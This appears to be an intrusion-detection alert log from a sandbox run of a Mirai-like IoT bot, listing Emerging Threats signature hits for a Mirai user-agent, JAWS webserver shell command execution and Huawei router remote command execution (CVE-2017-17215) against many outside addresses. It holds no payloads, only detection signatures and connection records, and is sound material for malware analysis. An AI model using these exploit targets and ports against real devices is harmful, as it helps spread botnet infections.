                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334210196.186.9.845501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334210196.186.9.845501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336650160.214.108.2937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348736186.152.155.6737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356098156.38.202.19537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350868160.92.157.17437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360006156.181.106.1375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360006156.181.106.1375501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235458040.22.255.1965501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235458040.22.255.1965501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338430186.128.102.25437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342872135.123.170.1265501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342872135.123.170.1265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346612105.81.117.2337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344356156.108.163.8837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346410190.38.238.21837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356398156.192.95.3637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344168156.172.175.75501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344168156.172.175.75501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234191027.248.126.1695501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234191027.248.126.1695501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351788156.172.132.3937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344296156.122.216.837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235681635.179.7.65501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235681635.179.7.65501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341658220.167.51.185501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341658220.167.51.185501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354596186.63.88.13437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341394160.167.231.2837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333738186.147.245.9737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235432064.254.23.1885501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235432064.254.23.1885501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350874136.80.229.625501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350874136.80.229.625501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343586160.39.2.8537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235338861.185.110.55501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235338861.185.110.55501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337644207.70.185.1575501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337644207.70.185.1575501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233593098.17.151.1195501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233593098.17.151.1195501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356718181.114.192.22037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349624111.49.199.2345501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349624111.49.199.2345501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344104105.130.30.8737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356510211.176.247.145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356510211.176.247.145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354982103.23.208.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354982103.23.208.1145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332790210.251.176.935501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332790210.251.176.935501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354756160.91.172.21237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356510141.98.255.2405501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356510141.98.255.2405501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235585441.236.63.14737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346584208.183.53.2295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346584208.183.53.2295501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234482279.42.169.1495501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234482279.42.169.1495501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351606105.170.55.19437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356656105.24.203.17937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334234140.12.157.1965501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334234140.12.157.1965501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23421004.249.8.1105501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23421004.249.8.1105501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354206105.108.90.17137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348040105.86.41.17737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234871482.227.156.1085501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234871482.227.156.1085501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341252181.101.55.6737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343708105.96.59.16637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356092160.167.8.21237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357940186.225.168.25137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23389184.160.31.185501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23389184.160.31.185501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234136850.203.45.1795501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234136850.203.45.1795501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345150138.138.124.1125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345150138.138.124.1125501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234458651.7.30.2415501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234458651.7.30.2415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346374186.127.124.17837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358612197.76.161.10737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352728102.149.182.4637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341142102.97.58.3737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342230186.113.70.5437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351584151.203.90.1645501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351584151.203.90.1645501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235639099.202.166.905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235639099.202.166.905501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347742197.76.149.16537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348008197.90.25.23837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353672186.132.102.037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350000102.125.209.2737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235359641.204.8.437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342226186.50.139.16937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342392105.0.245.3237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342648208.98.83.695501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342648208.98.83.695501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358992197.3.172.23137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354186160.191.177.1537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233896036.175.76.265501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233896036.175.76.265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344394160.48.139.24937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357980154.238.160.1505501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357980154.238.160.1505501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341666160.70.215.6037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234456068.252.202.2525501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234456068.252.202.2525501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346450216.74.172.2395501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346450216.74.172.2395501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338204223.39.10.10237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336776186.60.180.24837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235008041.233.171.2045501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235008041.233.171.2045501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349676197.7.231.2237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358992160.196.119.11537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345996157.69.119.13737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359936186.246.187.17537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336476156.249.217.20637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235239670.243.207.2255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235239670.243.207.2255501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23405942.145.22.1635501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23405942.145.22.1635501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233765895.30.115.825501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233765895.30.115.825501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333536181.210.147.23437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234690650.188.83.1325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234690650.188.83.1325501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338644102.73.210.14637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333168123.13.225.2175501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333168123.13.225.2175501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344232105.162.166.15937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339990223.203.136.7937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353554102.117.148.2365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353554102.117.148.2365501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359624186.168.23.21137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344578175.207.105.495501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344578175.207.105.495501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336954186.144.138.14137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233526657.0.196.615501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233526657.0.196.615501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341024190.204.11.19337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336388138.113.28.705501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336388138.113.28.705501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233493639.97.23.315501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233493639.97.23.315501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348912181.132.59.25337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338800167.208.41.1585501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338800167.208.41.1585501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347744142.169.105.1535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347744142.169.105.1535501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348316190.28.168.24237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343954156.41.129.23637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234204241.59.182.24137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343466223.205.185.3337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341536156.63.155.17437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235345841.64.34.1675501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235345841.64.34.1675501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235202483.41.100.225501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235202483.41.100.225501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341390175.171.28.1135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341390175.171.28.1135501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233555045.133.247.325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233555045.133.247.325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234778885.162.145.1005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234778885.162.145.1005501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352698105.158.26.1637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359336114.183.106.475501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359336114.183.106.475501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335986130.95.144.445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335986130.95.144.445501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337738160.196.220.637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333848115.25.106.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333848115.25.106.1145501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353242160.71.67.3737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351666104.247.145.1455501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351666104.247.145.1455501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234381669.164.93.1475501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234381669.164.93.1475501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342094181.122.190.13637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344524181.214.255.15937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356398186.98.116.12637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335042194.214.18.125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335042194.214.18.125501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337210191.233.197.1545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337210191.233.197.1545501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350828181.38.27.2137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345446105.97.113.22337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355836190.156.185.2937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236064423.226.90.1075501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236064423.226.90.1075501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344754130.34.76.1195501TCP
